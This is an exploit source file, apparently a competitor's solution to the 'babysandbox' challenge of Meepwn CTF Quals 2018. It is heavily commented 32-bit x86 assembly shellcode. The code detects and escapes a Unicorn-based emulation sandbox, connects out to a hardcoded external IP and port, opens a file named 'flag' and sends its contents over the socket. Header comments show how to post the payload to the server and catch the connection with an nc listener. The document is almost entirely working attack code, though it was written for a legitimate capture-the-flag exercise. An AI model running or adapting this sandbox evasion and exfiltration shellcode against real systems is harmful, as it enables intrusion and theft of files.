Meepwn CTF Quals 2018: babysandbox
# Exploit for the "babysandbox" challenge of the Meepwn CTF 2018. | |
# Written by lenerd for Cyclopropenylidene. | |
# You can assemble the payload via
# rasm2 -b32 -f exploit.s -B | base64 -w 0
# or use
# gcc -m32 exploit.s -nostdlib
# to build a standalone ELF executable. Both paths must see the same source:
# only '#' starts a comment in both assemblers (GAS treats ';' as a statement
# separator in x86 mode, so a ';'-"commented" instruction is still assembled).
# # Send the payload to the challenge: | |
# $ http --session /tmp/baby.json -v POST http://178.128.100.75/exploit payload=$(rasm2 -b32 -f exploit.s -B | base64 -w 0) | |
# | |
# # Wait for a connection on the server: | |
# $ nc -vkl 16962 | |
# Listening on [0.0.0.0] (family 0, port 16962) | |
# Connection from 178.128.100.75 42090 received! | |
# MeePwnCTF{Unicorn_Engine_Is_So_Good_But_Not_Perfect} | |
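.intel_syntax noprefix
.globl _start

# Register roles for the whole payload:
#   edi = connected socket fd (set after socket(), used by connect()/sendfile())
#   esi = fd of "flag" (set after open(), consumed by sendfile(), then reused)
# Comments use '#' only. With .intel_syntax GAS treats ';' as a statement
# separator, so an instruction "commented out" with ';' is still assembled by
# gcc, while rasm2 treats ';' as a comment -- the two build paths would then
# produce different payloads.
_start:
# Fool the sandbox:
# If the code is emulated, the stack is always located at 0x1200000. The
# emulation is stopped if any interrupt different from 0x80 is encountered.
# On the real target esp is elsewhere, so the int 0x42 is skipped.
        cmp     esp, 0x1200000
        jne     continue
        int     0x42                    # emulated: abort the emulation here
continue:
# Classic 32-bit Linux multiplexes all socket operations through the single
# syscall `socketcall` (no. 0x66): ebx = sub-function number, ecx = pointer to
# an array of its arguments (pushed in reverse so esp points at the first).
# socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
        mov     eax, 0x66               # SYS_socketcall
        mov     ebx, 1                  # SYS_SOCKET
        push    0                       # IPPROTO_IP
        push    1                       # SOCK_STREAM (2 would be SOCK_DGRAM)
        push    2                       # AF_INET
        mov     ecx, esp                # ecx = &{domain, type, protocol}
        int     0x80
        mov     edi, eax                # edi = sockfd (no error check: CTF payload)
# connect(sockfd, addr, addrlen)
        mov     eax, 0x66               # SYS_socketcall
        mov     ebx, 3                  # SYS_CONNECT
# Build struct sockaddr_in (16 bytes) on the stack, lowest address last:
#   sin_family = AF_INET, sin_port (network byte order), sin_addr, sin_zero[8]
        push    0                       # sin_zero[4..7]
        push    0                       # sin_zero[0..3]
# push  0x0100007f                      # HOST = 127.0.0.1 (local testing)
        push    0x5cd180b2              # HOST = 178.128.209.92 (bytes b2 80 d1 5c)
        push    0x42420002              # sin_port = 0x4242 (= 16962), sin_family = 2
        mov     edx, esp                # edx = &sockaddr_in
        push    16                      # addrlen = sizeof(struct sockaddr_in)
        push    edx                     # addr
        push    edi                     # sockfd
        mov     ecx, esp                # ecx = &{sockfd, addr, addrlen}
        int     0x80
# open("flag", O_RDONLY, 0)
        mov     eax, 0x5                # SYS_open
        xor     ecx, ecx                # flags = O_RDONLY
        xor     edx, edx                # mode (ignored without O_CREAT)
        push    0                       # NUL terminator
        push    0x67616c66              # "flag" (little-endian 'f','l','a','g')
        mov     ebx, esp                # ebx = "flag"
        int     0x80
        mov     esi, eax                # esi = flag fd
# sendfile(out_fd, in_fd, offset, count): copy the flag straight to the socket
        mov     eax, 0xbb               # SYS_sendfile
        mov     ebx, edi                # out_fd = sockfd
        mov     ecx, esi                # in_fd = flag fd (read before esi is reused)
        xor     edx, edx                # offset = NULL -> use the file position
        mov     esi, 256                # count = 256 bytes
        int     0x80
# exit(0)
        mov     eax, 1                  # SYS_exit
        xor     ebx, ebx                # status = 0
        int     0x80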
Exploit for the babysandbox challenge of Meepwn CTF Quals 2018 |